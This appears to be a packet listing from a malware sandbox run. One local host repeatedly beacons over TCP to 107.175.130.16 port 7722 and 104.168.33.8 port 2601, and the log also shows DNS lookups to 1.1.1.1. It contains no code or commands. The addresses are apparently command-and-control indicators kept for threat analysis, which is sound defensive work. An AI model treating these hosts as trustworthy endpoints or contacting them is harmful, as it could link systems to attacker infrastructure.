                                                      Jan 7, 2025 01:28:28.215260029 CET524687722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:28.217077017 CET524687722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:28.217150927 CET524687722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:28.225790977 CET772252468107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:28.266345978 CET772252468107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:28.577620029 CET772252468107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:28.577702999 CET524687722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:32.700381994 CET524707722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:32.704612970 CET524727722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:32.705328941 CET772252470107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:32.705385923 CET524707722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:32.706635952 CET524707722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:32.706757069 CET524707722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:32.709531069 CET772252472107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:32.709580898 CET524727722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:32.711467028 CET772252470107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:32.718913078 CET524727722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:32.718982935 CET524727722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:32.723808050 CET772252472107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:32.751785994 CET772252470107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:32.767729998 CET772252472107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:33.076977015 CET772252470107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:33.077038050 CET524707722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:33.093662977 CET772252472107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:33.093717098 CET524727722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:37.700642109 CET524747722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:37.705516100 CET772252474107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:37.705588102 CET524747722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:37.705986977 CET524747722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:37.706058025 CET524747722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:37.710774899 CET772252474107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:37.751837015 CET772252474107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:37.782357931 CET524767722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:37.787355900 CET772252476107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:37.787424088 CET524767722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:37.794126034 CET524767722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:37.794286966 CET524767722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:37.799617052 CET772252476107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:37.844477892 CET772252476107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:38.093689919 CET772252474107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:38.093769073 CET524747722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:38.158920050 CET772252476107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:38.159008980 CET524767722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.225774050 CET524787722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.230586052 CET772252478107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:43.230642080 CET524787722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.231666088 CET524787722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.232104063 CET524787722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.236471891 CET772252478107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:43.245438099 CET524807722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.250283957 CET772252480107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:43.250360012 CET524807722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.266397953 CET524807722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.266499043 CET524807722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.271204948 CET772252480107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:43.283756971 CET772252478107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:43.311682940 CET772252480107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:43.603209972 CET772252478107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:43.603271008 CET524787722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:43.627504110 CET772252480107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:43.627687931 CET524807722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:49.469346046 CET504262601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:49.474245071 CET260150426104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:28:49.474332094 CET504262601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:49.474812031 CET504262601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:49.479661942 CET260150426104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:28:49.479707003 CET504262601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:49.484451056 CET260150426104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:28:49.981924057 CET260150426104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:28:49.981976986 CET504262601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:49.982008934 CET504262601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:28:52.492634058 CET524847722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:52.498557091 CET772252484107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:52.498635054 CET524847722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:52.501612902 CET524847722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:52.502110004 CET524847722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:52.506407022 CET772252484107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:52.535331964 CET524867722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:52.540946960 CET772252486107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:52.540997982 CET524867722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:52.551681995 CET772252484107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:52.565915108 CET524867722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:52.566024065 CET524867722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:52.570669889 CET772252486107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:52.611712933 CET772252486107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:52.864129066 CET772252484107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:52.864208937 CET524847722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:52.905472994 CET772252486107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:52.905534029 CET524867722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.239267111 CET524887722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.244158983 CET772252488107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:58.244204044 CET524887722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.244666100 CET524907722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.247006893 CET524887722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.247103930 CET524887722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.249407053 CET772252490107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:58.249453068 CET524907722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.251780033 CET772252488107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:58.264951944 CET524907722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.265074015 CET524907722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.269840002 CET772252490107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:58.299742937 CET772252488107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:58.311719894 CET772252490107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:58.614181995 CET772252490107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:58.614239931 CET524907722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:28:58.631808996 CET772252488107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:28:58.631872892 CET524887722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.492578983 CET524927722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.497476101 CET772252492107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:07.497528076 CET524927722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.499514103 CET524927722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.499617100 CET524927722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.499818087 CET524947722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.504367113 CET772252492107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:07.504631996 CET772252494107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:07.504693031 CET524947722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.522295952 CET524947722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.522397995 CET524947722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.527137995 CET772252494107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:07.547740936 CET772252492107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:07.567789078 CET772252494107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:07.861978054 CET772252492107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:07.862060070 CET524927722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:07.892159939 CET772252494107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:07.892236948 CET524947722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.505604029 CET524967722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.510508060 CET772252496107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:12.510556936 CET524967722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.510710955 CET524987722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.511706114 CET524967722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.511800051 CET524967722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.515449047 CET772252498107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:12.516495943 CET772252496107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:12.520060062 CET524987722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.531163931 CET524987722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.531235933 CET524987722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.536005974 CET772252498107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:12.563702106 CET772252496107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:12.579679012 CET772252498107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:12.915002108 CET772252496107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:12.915061951 CET524967722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:12.928116083 CET772252498107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:12.928160906 CET524987722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:16.057555914 CET504442601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:16.062366962 CET260150444104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:29:16.062444925 CET504442601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:16.063354969 CET504442601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:16.068197966 CET260150444104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:29:16.068247080 CET504442601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:16.073016882 CET260150444104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:29:16.599417925 CET260150444104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:29:16.599494934 CET504442601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:16.599579096 CET504442601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:22.501633883 CET525027722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:22.503164053 CET525047722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:22.506536007 CET772252502107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:22.506586075 CET525027722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:22.507283926 CET525027722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:22.507356882 CET525027722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:22.507966995 CET772252504107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:22.508013010 CET525047722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:22.512026072 CET772252502107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:22.520330906 CET525047722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:22.520507097 CET525047722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:22.525155067 CET772252504107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:22.559737921 CET772252502107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:22.571717978 CET772252504107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:22.871471882 CET772252504107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:22.871572971 CET525047722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:22.874814987 CET772252502107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:22.874862909 CET525027722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.251368046 CET525067722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.256050110 CET525087722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.256969929 CET772252506107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.257036924 CET525067722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.260922909 CET772252508107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.260993004 CET525087722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.261332989 CET525067722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.261444092 CET525067722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.263006926 CET525087722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.263580084 CET525087722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.266123056 CET772252506107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.267752886 CET772252508107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.273781061 CET525107722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.278594971 CET772252510107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.278637886 CET525107722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.307691097 CET772252506107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.311705112 CET772252508107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.398883104 CET525107722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.399010897 CET525107722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.403748989 CET772252510107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.451698065 CET772252510107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.637547970 CET772252506107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.637604952 CET525067722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.642577887 CET772252510107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.642628908 CET525107722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:28.644433975 CET772252508107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:28.644491911 CET525087722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:37.505609989 CET525127722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:37.510523081 CET772252512107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:37.510585070 CET525127722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:37.511034966 CET525127722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:37.511126995 CET525127722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:37.515779972 CET772252512107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:37.559725046 CET772252512107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:37.876580954 CET772252512107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:37.876655102 CET525127722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:42.675142050 CET504582601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:42.680044889 CET260150458104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:29:42.680118084 CET504582601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:42.680746078 CET504582601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:42.685544014 CET260150458104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:29:42.685610056 CET504582601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:42.690412045 CET260150458104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:29:43.230756044 CET260150458104.168.33.8192.168.2.13
                                                      Jan 7, 2025 01:29:43.230809927 CET504582601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:43.230958939 CET504582601192.168.2.13104.168.33.8
                                                      Jan 7, 2025 01:29:43.256114006 CET525167722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.260984898 CET772252516107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.261039972 CET525167722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.262917042 CET525167722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.262996912 CET525167722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.267690897 CET772252516107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.283410072 CET525187722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.288286924 CET772252518107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.288337946 CET525187722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.311686993 CET772252516107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.319981098 CET525207722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.324774027 CET772252520107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.324826002 CET525207722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.335252047 CET525187722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.335464001 CET525187722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.340095997 CET772252518107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.349242926 CET525207722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.349419117 CET525207722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.354006052 CET772252520107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.383677959 CET772252518107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.399724960 CET772252520107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.641184092 CET772252516107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.641350031 CET525167722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.672045946 CET772252518107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.672101974 CET525187722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:43.701021910 CET772252520107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:43.701257944 CET525207722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.505038977 CET525227722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.509931087 CET772252522107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.509989023 CET525227722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.514748096 CET525227722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.514941931 CET525227722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.518512964 CET525247722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.519633055 CET772252522107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.523360968 CET772252524107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.523415089 CET525247722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.524070978 CET525247722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.524152994 CET525247722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.527817011 CET525267722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.528893948 CET772252524107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.532661915 CET772252526107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.533107042 CET525267722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.535588026 CET525267722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.535851002 CET525267722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.540431976 CET772252526107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.567704916 CET772252522107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.571754932 CET772252524107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.583734989 CET772252526107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.879718065 CET772252522107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.879781008 CET525227722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.909954071 CET772252524107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.910039902 CET525247722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:52.929708958 CET772252526107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:52.929794073 CET525267722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.278264999 CET525287722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.283163071 CET772252528107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:58.283216953 CET525287722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.284970045 CET525287722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.285167933 CET525287722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.289710045 CET772252528107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:58.296560049 CET525307722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.301312923 CET772252530107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:58.301361084 CET525307722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.303150892 CET525307722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.303294897 CET525307722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.307960033 CET772252530107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:58.331734896 CET772252528107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:58.351705074 CET772252530107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:58.658576012 CET772252528107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:58.658655882 CET525287722192.168.2.13107.175.130.16
                                                      Jan 7, 2025 01:29:58.666403055 CET772252530107.175.130.16192.168.2.13
                                                      Jan 7, 2025 01:29:58.666471004 CET525307722192.168.2.13107.175.130.16
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 7, 2025 01:27:56.028634071 CET4782753192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:56.035677910 CET53478271.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:56.039400101 CET3335353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:56.047415018 CET53333531.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:56.050663948 CET4539453192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:56.059755087 CET53453941.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:56.062861919 CET4624753192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:56.069763899 CET53462471.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:56.072755098 CET5401353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:56.086808920 CET53540131.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:56.089766979 CET4164653192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:56.098995924 CET53416461.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:57.670093060 CET5511253192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:57.677966118 CET53551121.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:57.681900978 CET4920353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:57.701088905 CET53492031.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:57.705338001 CET4427453192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:57.719511032 CET53442741.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:57.724271059 CET4599353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:57.738755941 CET53459931.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:57.742723942 CET5751153192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:27:57.757059097 CET53575111.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:27:57.760874033 CET4103453192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:02.773195028 CET4484353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:07.796875954 CET3916053192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:12.816653967 CET5918853192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:17.822242022 CET5837553192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:24.397305965 CET4624353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:24.404450893 CET53462431.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:28:24.405100107 CET3788853192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:24.424210072 CET53378881.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:28:24.424920082 CET4831353192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:24.433070898 CET53483131.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:28:24.433701992 CET3370453192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:24.441091061 CET53337041.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:28:24.441704988 CET5877753192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:24.451229095 CET53587771.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:28:24.451879978 CET4315453192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:29.453876019 CET5000053192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:34.457639933 CET3457753192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:39.461802959 CET5064653192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:44.465631962 CET4807653192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:50.983656883 CET3736653192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:50.992387056 CET53373661.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:28:50.992981911 CET3479553192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:51.007659912 CET53347951.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:28:51.008529902 CET3416453192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:51.022861958 CET53341641.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:28:51.023720026 CET3326153192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:51.030919075 CET53332611.1.1.1192.168.2.13
                                                      Jan 7, 2025 01:28:51.031742096 CET3450253192.168.2.131.1.1.1
                                                      Jan 7, 2025 01:28:51.039036036 CET53345021.1.1.1192.168.2.13
